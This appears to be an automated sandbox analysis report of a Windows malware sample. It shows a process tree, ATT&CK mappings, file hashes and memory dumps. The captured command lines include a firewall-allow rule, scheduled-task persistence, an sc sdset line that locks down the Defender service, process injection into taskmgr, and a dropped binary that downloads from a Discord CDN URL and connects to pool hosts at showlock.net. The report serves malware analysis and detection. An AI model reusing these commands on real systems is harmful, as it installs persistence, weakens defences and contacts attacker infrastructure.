"C:\Users\Admin\AppData\Local\Temp\a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:512
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell -nologo -noprofile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:204
- C:\Users\Admin\AppData\Local\Temp\a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
  "C:\Users\Admin\AppData\Local\Temp\a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe"
  2⤵
  - Windows security bypass
  - Windows security modification
  - Adds Run key to start application
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3320
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1312
- - C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1988
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Modifies data under HKEY_USERS
      PID:2516
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:760
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Manipulates WinMonFS driver.
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4944
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2860
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:1124
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /delete /tn ScheduledUpdate /f
      4⤵
      PID:3148
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4992
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Drops file in System32 directory
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:344
  - - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:4928
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:4140
  - - C:\Windows\windefender.exe
      "C:\Windows\windefender.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4980
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2860
      - C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        6⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:4524
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4460
  - - C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
      4⤵
      PID:2284
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      4⤵
      PID:952
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
      C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
      4⤵
      PID:5052

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_md3bpvjc.bb2.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
488KB

MD5
aa2a161295d662465ef166576d4d9cc4

SHA1
5e881e7908a328f23aa75d803ac00fce936bdaf2

SHA256
df1bd0b4de86c18dc5998c6c6f09ac3cac2553bf09417e7f0d3bc769c11a31f5

SHA512
ab0bcac38ec8551d00cf5827ccad6fa005e721f234e8de1265713e699a157004dbb736b8317d43a06294df9a8cc5f5f7a1ce2a8d24293dbef2efd7dea8894aba

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe

Filesize
495KB

MD5
e87936e400d92c5e8ffb3d9bd5a1fa57

SHA1
f75416a1413dc1adf02710a97df8378cf0a97c51

SHA256
0502698c585ac3ab6e2043d069a2b8db915d2c1c85aa2fb192191834c54153ad

SHA512
9f512ee0e7e8a0e69fb872d4c7a40145773fe52552a5437e4c1ba461fba47b9686776619144ef2ddcd60fa2cc38d378c10d8398dd3396576814f70f0dddbea8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
553KB

MD5
bf20ca9faf7e8725a5d2033ce6d2b4f7

SHA1
37002bf3fdcc831f71085b0f22c274b800fb93ac

SHA256
73ee863e76a551f29fa1e64af8325b9062a8299d2a7931c52c87094bd829cce1

SHA512
95c7d715a2885c9bf907408779c72bd72cf7f29ff263b509a58db83b4bbae40268d9c81067095d7597b2a0312105b70259ad1f0242fea9b878f49f1965f84ab8

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe

Filesize
559KB

MD5
dd09a7cf26c9805d01540509aae686ae

SHA1
e7dd2419c921f7c877a4f86ac8658e9e584045b2

SHA256
1555344a674a9ccc467099931c1eb2dd2656b86831efea32f3f5a12feffe6113

SHA512
318af13b2d5ba17da867ab0700fc04ec1f78f5d0213ea895e1a78d6e91eaa16719b7ae386c6f7ceae99668ef600dd6d8e0f34060c5181ea11d01baba6432fe20

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe

Filesize
661KB

MD5
5ecdd0669197a3463d91152cde2228b1

SHA1
36a298d87c1a671304c2816139533cd3c4dd515d

SHA256
c3c56d8773cfc86903e98ad235c7da58fb34ec7f80b2d71736ce8caabaf36768

SHA512
dc4c458e74d4b77d16a9680fa1de699371da754271ab078ca59dd14fb157faee375d2be06e96cc290ea25cf7a54f97da339c4498314e3830c4e9588e353d5819

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

Filesize
281KB

MD5
d98e33b66343e7c96158444127a117f6

SHA1
bb716c5509a2bf345c6c1152f6e3e1452d39d50d

SHA256
5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

SHA512
705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
af04404a5e57f34f0aab89af0eca3177

SHA1
a34ae4ab5f0f251073d729cb58cbbe219e07b3c2

SHA256
6ae95f77891401af97dfe1001bb875e84375784fadf3fc17f446067587724a23

SHA512
64d22249b012ba5a1511c7374159a3a6d665dfdd3faa2ec45778dd22f322ebcbf3b4b8c27f6188680cbfc50c720116fd3fd884f4f60e58213baec259f05afe60

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
de39d6c577665fba82bb71892e625731

SHA1
0ea2ed28b70726b75a136331e81750f82c6c3986

SHA256
0df11e7072e8dcce4f85e939f12fdd0882857a99705014712e068678108d4cec

SHA512
3eaf95453ece9e124c2b75ea8d1c8a56a3760df5d086a1662ea2be496eaa78f1bb601481b1d08730ff40b1a1ca101dcafac1b750038998396a6a5b74d54a9388

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
b97123e35fe131795f03579ae4fe7553

SHA1
1673ab56dd88f96f613ba6fab988d412745fe0da

SHA256
c61b72a1b959b58f92ae9131a5caaeaa12f601d4f3f128c2ad14fe79816127de

SHA512
7dbcb8d193b97801ed2dcb1435560a97045a881f3ae2232d82765eb8cc8d95c857d52bfe72f7d9949d1cfda30150c081cc0f1a9e9cf001ce61d33d7cf7a63e11

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
6de5e4b2034bebbfe80a699598b8cef7

SHA1
3929eaca2cb4b6f32cc2c34cbddacbe51d5d0a87

SHA256
2e757625d0a1dc09dc5a0abbbc583331a8a6a8124839712658c338c424e3ece8

SHA512
ab422eeadbb2eca0ebe375c6e4d351c8362daa55025616f48873d57424394f20b32bfa68078351fe59be2afbf95c5164ed4ec67b6dd2d7de9872e9b3f6ed78f5

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
787d01600a722210acb41764c10baadf

SHA1
27d50be138e66cf7ddf33735a7f1abc87ee5cd3d

SHA256
e2de3259f0e5fc5fe700f16e4be1a821964200ee76d41176aad60730a2a068f1

SHA512
7ae6e15e162e081e03c87809ff69314343dcd2acae549ff7b51cba39195817972a6300891a1df18c1e34b384c5a645758f526ee96c822b44701be18b9e5ee482

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
c6b9fd9f98f6510ac29ea51bfaaa268d

SHA1
f77bc7a65c3e68de07c00a4abb45cceafbe9176c

SHA256
228b861f9ffd8047b4b4dfc33ab22b4722d26b24ff1f2f9674d000dc840b6ab7

SHA512
446b94cd6b0c859e3e69bf8b945a62d951fa56685a1524b1e6124622b5eccc1fa21de8d113c8b236830f3029ee242773ec1299367ba41ffaa823d5f9a8a1841b

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
d13e322423cb6a7419def00459227e4a

SHA1
0e47ae58879902b322a031e97f62836b8d8c967f

SHA256
f639d2bb5a757603d1350f2b7af81e4600835fd05cb5267da566c2932fd47571

SHA512
214dfee4c7ffa6494ef62f8dcad2501fa43e28e13ac805f5af31fbadcbdac1dbf0e83669b5fae32d1304e073ee7acfb6db2c007aa47e7e5c94a246be365b730d

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
18KB

MD5
fbe78656ebad1112100ab478e3d7ab97

SHA1
102f354f704ae248d84f58b9e93abd66ea34b4a6

SHA256
4fce9d434b3c35b925f6ae4dbba2fd41a7618e0bfca83f26c002a0a7fb642c63

SHA512
17b8e6a22c2d55af3a1a57231240f75adcbd5437d2a4ebfdcc6e2e9a1d899597d2aecc59a915586220fb8bcb3d2ddb7e721fd4830b798553bb40d758263b3e8c

Download Submit
C:\Windows\rss\csrss.exe

Filesize
4.1MB

MD5
dab5dbe32375affdb28da1f91e309015

SHA1
dfacef5249e58cd36fe4396bb31fd2d8f0a4fa2d

SHA256
a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3

SHA512
68f8596040da58ee9f4f291a71fad13f2b27dc81ae26a35e4441ee9411a818a7ce70f0d7f8fb7f3b0590b639d8295b1dd741647c1a1b6b581acdcecb88855331

Download Submit
C:\Windows\windefender.exe

Filesize
2.0MB

MD5
8e67f58837092385dcf01e8a2b4f5783

SHA1
012c49cfd8c5d06795a6f67ea2baf2a082cf8625

SHA256
166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

SHA512
40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

Download Submit
memory/204-13-0x0000000007E50000-0x0000000007EB6000-memory.dmp

Filesize
408KB

Download
memory/204-16-0x00000000087A0000-0x00000000087EB000-memory.dmp

Filesize
300KB

Download
memory/204-76-0x000000000A210000-0x000000000A22E000-memory.dmp

Filesize
120KB

Download
memory/204-75-0x0000000070990000-0x0000000070CE0000-memory.dmp

Filesize
3.3MB

Download
memory/204-82-0x000000000A450000-0x000000000A4E4000-memory.dmp

Filesize
592KB

Download
memory/204-275-0x000000000A3F0000-0x000000000A40A000-memory.dmp

Filesize
104KB

Download
memory/204-280-0x000000000A3E0000-0x000000000A3E8000-memory.dmp

Filesize
32KB

Download
memory/204-298-0x0000000073C30000-0x000000007431E000-memory.dmp

Filesize
6.9MB

Download
memory/204-74-0x0000000070940000-0x000000007098B000-memory.dmp

Filesize
300KB

Download
memory/204-73-0x000000000A230000-0x000000000A263000-memory.dmp

Filesize
204KB

Download
memory/204-6-0x0000000073C3E000-0x0000000073C3F000-memory.dmp

Filesize
4KB

Download
memory/204-66-0x0000000009400000-0x0000000009476000-memory.dmp

Filesize
472KB

Download
memory/204-35-0x00000000088A0000-0x00000000088DC000-memory.dmp

Filesize
240KB

Download
memory/204-81-0x000000000A270000-0x000000000A315000-memory.dmp

Filesize
660KB

Download
memory/204-15-0x0000000008290000-0x00000000082AC000-memory.dmp

Filesize
112KB

Download
memory/204-14-0x0000000007EE0000-0x0000000008230000-memory.dmp

Filesize
3.3MB

Download
memory/204-12-0x0000000007DE0000-0x0000000007E46000-memory.dmp

Filesize
408KB

Download
memory/204-11-0x0000000007500000-0x0000000007522000-memory.dmp

Filesize
136KB

Download
memory/204-10-0x0000000073C30000-0x000000007431E000-memory.dmp

Filesize
6.9MB

Download
memory/204-8-0x0000000007640000-0x0000000007C68000-memory.dmp

Filesize
6.2MB

Download
memory/204-9-0x0000000073C30000-0x000000007431E000-memory.dmp

Filesize
6.9MB

Download
memory/204-7-0x0000000004DD0000-0x0000000004E06000-memory.dmp

Filesize
216KB

Download
memory/344-1525-0x0000000070980000-0x0000000070CD0000-memory.dmp

Filesize
3.3MB

Download
memory/344-1524-0x0000000070910000-0x000000007095B000-memory.dmp

Filesize
300KB

Download
memory/344-1504-0x00000000076F0000-0x0000000007A40000-memory.dmp

Filesize
3.3MB

Download
memory/512-302-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/512-1-0x00000000047A0000-0x0000000004BA8000-memory.dmp

Filesize
4.0MB

Download
memory/512-299-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/512-301-0x0000000004BB0000-0x000000000549B000-memory.dmp

Filesize
8.9MB

Download
memory/512-3-0x0000000000400000-0x0000000000D1C000-memory.dmp

Filesize
9.1MB

Download
memory/512-2-0x0000000004BB0000-0x000000000549B000-memory.dmp

Filesize
8.9MB

Download
memory/760-803-0x0000000070AD0000-0x0000000070E20000-memory.dmp

Filesize
3.3MB

Download
memory/760-802-0x0000000070A60000-0x0000000070AAB000-memory.dmp

Filesize
300KB

Download
memory/952-2291-0x0000000000FA0000-0x000000000186D000-memory.dmp

Filesize
8.8MB

Download
memory/952-2535-0x0000000000FA0000-0x000000000186D000-memory.dmp

Filesize
8.8MB

Download
memory/1312-305-0x00000000078B0000-0x0000000007C00000-memory.dmp

Filesize
3.3MB

Download
memory/1312-306-0x0000000007F40000-0x0000000007F8B000-memory.dmp

Filesize
300KB

Download
memory/1312-325-0x0000000070A60000-0x0000000070AAB000-memory.dmp

Filesize
300KB

Download
memory/1312-331-0x0000000009470000-0x0000000009515000-memory.dmp

Filesize
660KB

Download
memory/1312-326-0x0000000070AD0000-0x0000000070E20000-memory.dmp

Filesize
3.3MB

Download
memory/1604-563-0x0000000070A60000-0x0000000070AAB000-memory.dmp

Filesize
300KB

Download
memory/1604-564-0x0000000070AD0000-0x0000000070E20000-memory.dmp

Filesize
3.3MB

Download
memory/1628-2313-0x0000000070820000-0x000000007086B000-memory.dmp

Filesize
300KB

Download
memory/1628-2314-0x0000000070890000-0x0000000070BE0000-memory.dmp

Filesize
3.3MB

Download
memory/1756-1755-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1756-1758-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/1756-1752-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/2284-2048-0x0000000000400000-0x00000000008E1000-memory.dmp

Filesize
4.9MB

Download
memory/2284-2052-0x0000000000400000-0x00000000008E1000-memory.dmp

Filesize
4.9MB

Download
memory/2860-1024-0x0000000007330000-0x0000000007680000-memory.dmp

Filesize
3.3MB

Download
memory/2860-1045-0x00000000709C0000-0x0000000070A0B000-memory.dmp

Filesize
300KB

Download
memory/2860-1026-0x00000000079E0000-0x0000000007A2B000-memory.dmp

Filesize
300KB

Download
memory/2860-1046-0x0000000070A30000-0x0000000070D80000-memory.dmp

Filesize
3.3MB

Download
memory/2860-1051-0x0000000008F60000-0x0000000009005000-memory.dmp

Filesize
660KB

Download
memory/3320-1019-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4460-1805-0x00000000077F0000-0x0000000007B40000-memory.dmp

Filesize
3.3MB

Download
memory/4460-1826-0x0000000070870000-0x0000000070BC0000-memory.dmp

Filesize
3.3MB

Download
memory/4460-1831-0x00000000091F0000-0x0000000009295000-memory.dmp

Filesize
660KB

Download
memory/4460-1825-0x0000000070820000-0x000000007086B000-memory.dmp

Filesize
300KB

Download
memory/4460-1806-0x0000000007DA0000-0x0000000007DEB000-memory.dmp

Filesize
300KB

Download
memory/4944-1757-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1765-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1778-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1781-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1783-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1784-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1786-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1789-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1791-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1792-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1794-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1797-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1799-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1800-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1775-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1773-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1770-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1768-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1767-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1777-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1762-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1761-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1759-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-2533-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1738-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1753-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4944-1754-0x0000000000400000-0x0000000002B0C000-memory.dmp

Filesize
39.0MB

Download
memory/4968-2074-0x0000000070890000-0x0000000070BE0000-memory.dmp

Filesize
3.3MB

Download
memory/4968-2073-0x0000000070820000-0x000000007086B000-memory.dmp

Filesize
300KB

Download
memory/4968-2053-0x0000000007C90000-0x0000000007FE0000-memory.dmp

Filesize
3.3MB

Download
memory/4980-1751-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/4980-1748-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/4992-1263-0x0000000007790000-0x0000000007AE0000-memory.dmp

Filesize
3.3MB

Download
memory/4992-1264-0x00000000081A0000-0x00000000081EB000-memory.dmp

Filesize
300KB

Download
memory/4992-1284-0x0000000070960000-0x0000000070CB0000-memory.dmp

Filesize
3.3MB

Download
memory/4992-1283-0x0000000070910000-0x000000007095B000-memory.dmp

Filesize
300KB

Download
memory/4992-1289-0x00000000091B0000-0x0000000009255000-memory.dmp

Filesize
660KB

Download
memory/5052-2531-0x0000000000400000-0x00000000008E8000-memory.dmp

Filesize
4.9MB

Download